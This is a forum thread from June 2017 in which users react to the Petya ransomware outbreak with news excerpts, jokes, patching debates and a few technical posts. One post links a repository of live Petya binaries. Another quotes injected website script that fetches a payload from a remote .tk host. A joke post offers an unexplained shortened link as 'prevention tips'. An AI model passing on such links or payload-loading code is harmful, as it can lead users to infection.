Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

BREAKING: Multiple cyberattacks reported worldwide

  • 27-06-2017 4:03pm
    #1
    Site Banned Posts: 1


    BBC News wrote:
    A "powerful" ransomware cyberattack that started in Ukraine is rapidly spreading across the world and causing chaos, hitting banks, government IT systems and energy firms.

    British advertising group WPP said its computer networks in several locations had been targeted.

    The UK's National Cyber Security Centre is investigating how many more UK firms have been hit and is "trying to get an understanding of a fast-moving situation".

    Companies in six other countries were also hit, after Ukraine declared it had been struck by the biggest cyberattack in its history.

    The virus has been identified as 'Petrwrap', a modified version of the WannaCry ransomware that hit the NHS and other companies in May.

    Maersk Line said that all it's computer systems in the UK and Ireland were down.

    There are as yet unconfirmed reports that some Irish computers have also been hit.

    What are your thoughts on all this?

    Folks, just a warning, stay safe online. You could be hit by this new ransomware attack. Beware.


«1

Comments

  • Closed Accounts Posts: 8,555 ✭✭✭Roger Hassenforder


    FFS Vlad, cop on


  • Registered Users, Registered Users 2 Posts: 4,785 ✭✭✭KungPao


    For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV


  • Registered Users, Registered Users 2 Posts: 84,763 ✭✭✭✭Atlantic Dawn
    M


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?


  • Registered Users, Registered Users 2 Posts: 28,789 ✭✭✭✭ScumLord


    We need to bomb that cyberstan back to the stone age.


  • Registered Users, Registered Users 2 Posts: 38,247 ✭✭✭✭Guy:Incognito


    stepladder wrote: »

    What are your thoughts on all this?

    That the people who do these things are ****ing arseholes and no better than any other criminals.


  • Advertisement
  • Moderators, Category Moderators, Science, Health & Environment Moderators Posts: 9,338 CMod ✭✭✭✭Fathom


    Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!


  • Registered Users, Registered Users 2 Posts: 43,028 ✭✭✭✭SEPT 23 1989


    I presume the virus has spread to the ships and they are now out if control heading for the major coastal cities of the world


  • Registered Users, Registered Users 2 Posts: 2,690 ✭✭✭ElChe32


    Friend of mine in Madrid works for a company that was hit big time by the attack today. She's delighted she got let home early.


  • Closed Accounts Posts: 6,869 ✭✭✭PeterTheNinth


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    You sure about that AD. I'm worried about somebody clicking something in one of our customers. Wondering if we should pull the sites offline altogether.


  • Registered Users, Registered Users 2 Posts: 28,633 ✭✭✭✭murpho999


    Nothing wrong with my compu


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 37,316 ✭✭✭✭the_syco


    KungPao wrote: »
    For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!


  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

    These are exploits developed by the US government we're dealing with here. There are definitely things that will get a fully updated machine.


  • Closed Accounts Posts: 6,869 ✭✭✭PeterTheNinth


    My radio was taken over by ransomware a few years ago. Ryan Tubridy 1Million Euro in BitCoin, Joe Duffy 400K in Bit Coin, Marion Finucane 500K in BitCoin.


  • Posts: 0 [Deleted User]


    I presume the virus has spread to the ships and they are now out if control heading for the major coastal cities of the world

    Roland Emmerich already sweating over the rights


  • Registered Users, Registered Users 2 Posts: 11,690 ✭✭✭✭Skylinehead


    In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.

    Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!


    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .


  • Registered Users, Registered Users 2 Posts: 532 ✭✭✭Arbitrary


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

    http://redirectdetective.com/


  • Registered Users, Registered Users 2 Posts: 465 ✭✭Meeeee79


    the_syco wrote: »
    Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

    I think the irony has been lost on your here...........


  • Registered Users, Registered Users 2 Posts: 36,909 ✭✭✭✭BorneTobyWilde


    I found a signal hidden inside out own satellite system, and the clock is ticking .

    independence_day_powerbook_5300_1.jpg


  • Advertisement
  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!

    Its custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

    Some stuff is so custom there is simply no way to update it no matter how much you wanted to.


  • Registered Users, Registered Users 2 Posts: 4,785 ✭✭✭KungPao


    gctest50 wrote: »
    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .
    i-aint-clicking-that.jpg


  • Registered Users, Registered Users 2 Posts: 11,749 ✭✭✭✭wes


    Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

    I guess these thing will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he get around to covering this.

    **EDIT**
    Read on the UK independent that this is due to a smb vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.
    UK National Cyber Security Centre says it is 'aware of global ransomware incident'

    --SNIP--
    The Swiss government’s Reporting and Analysis Centre said the Petya virus was believed to be responsible and was spreading by “exploiting the SMB (Server Message Block) vulnerabilityâ€.
    --SNIP--


  • Registered Users, Registered Users 2 Posts: 5,673 ✭✭✭AudreyHepburn


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

    It's US government code that was leaked and has been adapted.


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    gctest50 wrote: »
    based on petya no ?

    obviously don't put click "run" - passworded anyways

    https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




    Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

    We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


    .

    father-dougal-presses-the-button.gif


  • Closed Accounts Posts: 870 ✭✭✭scopper


    To be fair the money in ransomware means someone was going to try again. By the end of the year this will be so normal it won't make the news.


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    It's US government code that was leaked and has been adapted.


    To encrypt your stuff the older one uses :

    https://en.wikipedia.org/wiki/Salsa20

    by :

    Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS


  • Registered Users, Registered Users 2 Posts: 19,739 ✭✭✭✭Ol' Donie


    It better not be that thing that wrecked boards for a few days again.

    That was rubbish.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 36,170 ✭✭✭✭ED E


    Its custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

    Some stuff is so custom there is simply no way to update it no matter how much you wanted to.


    Thats why you airgap it. Then worms arent a problem.


    wes wrote: »
    Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

    I guess these thing will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he get around to covering this.

    **EDIT**
    Read on the UK independent that this is due to a smb vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.

    Downgrade attacks are the problem. SMB v2/3 have significantly better security but you can trick any machine into falling back to v1 which is horribly out of date. MS have to kill support for it but havent yet as its gonna break a load of old machines.


  • Posts: 17,378 ✭✭✭✭ [Deleted User]


    gctest50 wrote: »
    To encrypt your stuff the older one uses :

    https://en.wikipedia.org/wiki/Salsa20

    by :

    Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS
    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.


  • Moderators, Category Moderators, Music Moderators, Politics Moderators, Society & Culture Moderators Posts: 22,360 CMod ✭✭✭✭Dravokivich


    I'm entirely surprised tbh....these guys are always one step ahead.

    That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

    "Infiltrate" is the wrong way to describe it. No specific organisations are being targeted.


  • Registered Users, Registered Users 2 Posts: 13,191 ✭✭✭✭sammyjo90


    Its hit the company i work for. Home early today and just been told that for now..there is no work tomorrow! Untill i wake up to a text saying i have to come in that is :(


  • Closed Accounts Posts: 1,568 ✭✭✭BillyBobBS


    Eh it's pretty worrying they where able to get into a nuclear power stations systems.


  • Moderators, Music Moderators Posts: 35,945 Mod ✭✭✭✭dr.bollocko


    BillyBobBS wrote: »
    Eh it's pretty worrying they where able to get into a nuclear power stations systems.

    If this creates a disaster that kills us all I'm glad that it happened on a Tuesday. At least it won't **** up the weekend.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 8,034 ✭✭✭mad muffin


    I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

    As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


    Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

    PHEW :D

    Carry on :pac:


  • Registered Users, Registered Users 2 Posts: 1,062 ✭✭✭gw80


    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    gw80 wrote: »
    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

    Might do, you had better uninstall grinder, just to be safe.


  • Registered Users, Registered Users 2 Posts: 10,423 ✭✭✭✭Outlaw Pete


    Yeah I noticed earlier when I was typing tha........ Allāhu akbar!! Death to America!!


  • Closed Accounts Posts: 3,257 ✭✭✭Yourself isit


    gw80 wrote: »
    Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

    Not if you upgraded to iOS 12.1 XP linuxvista. Pm me if stuck.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 18,288 ✭✭✭✭RobbingBandit


    Password:0000 the four 0s are in a different order now that will fool them.


  • Posts: 24,714 ✭✭✭✭ [Deleted User]


    It's great having a Mac and not having to worry about all these Microsoft attacks.


  • Closed Accounts Posts: 2,988 ✭✭✭jacksie66


    This post has been deleted.


  • Registered Users, Registered Users 2 Posts: 9,166 ✭✭✭Fr_Dougal


    It's great having a Mac and not having to worry about all these Microsoft attacks.

    Mac's aren't immune to cyberattacks. Safe from Windows based attacks alright.


  • Registered Users, Registered Users 2 Posts: 37,316 ✭✭✭✭the_syco


    It's great having a Mac and not having to worry about all these Microsoft attacks.
    Except from MacRansom; https://nakedsecurity.sophos.com/2017/06/15/more-mac-ransomware-666-and-7-days-to-pay/


  • Registered Users, Registered Users 2 Posts: 465 ✭✭Meeeee79


    mad muffin wrote: »
    I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

    As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


    Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

    PHEW :D

    Carry on :pac:

    I think the situation is a little more serious than the status of your delivery


  • Moderators, Arts Moderators Posts: 35,741 Mod ✭✭✭✭pickarooney


    Fathom wrote: »
    Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!

    Hide behind DMZ? How does that work?


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

    Maybe through hacked websites too

    this Ukrainian website
    ht***p://bahmut.com.ua

    has this buried in it :

    var REMOTE_URL = 'http://dfkiueswbgfreiwfsd.tk/i/'

    execute_request(traffic, REMOTE_URL, apply_payload);


    probably not free kitten pics ? dunno



    Reads the active computer name
    Reads the cryptographic machine GUID
    Parsed Javascript
    Reads Windows Trust Settings

    Opens the MountPointManager (often used to detect additional infection locations)

    Touches files in the Windows directory

    Found potential URL in binary/memory

    Reads information about supported languages


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

    Hacked update servers :



    https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/


    Delivery and installation


    Initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc.

    Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process.






  • Registered Users, Registered Users 2 Posts: 8,034 ✭✭✭mad muffin


    Meeeee79 wrote: »
    I think the situation is a little more serious than the status of your delivery

    You may think it… but you would be wrong.


  • Advertisement
Advertisement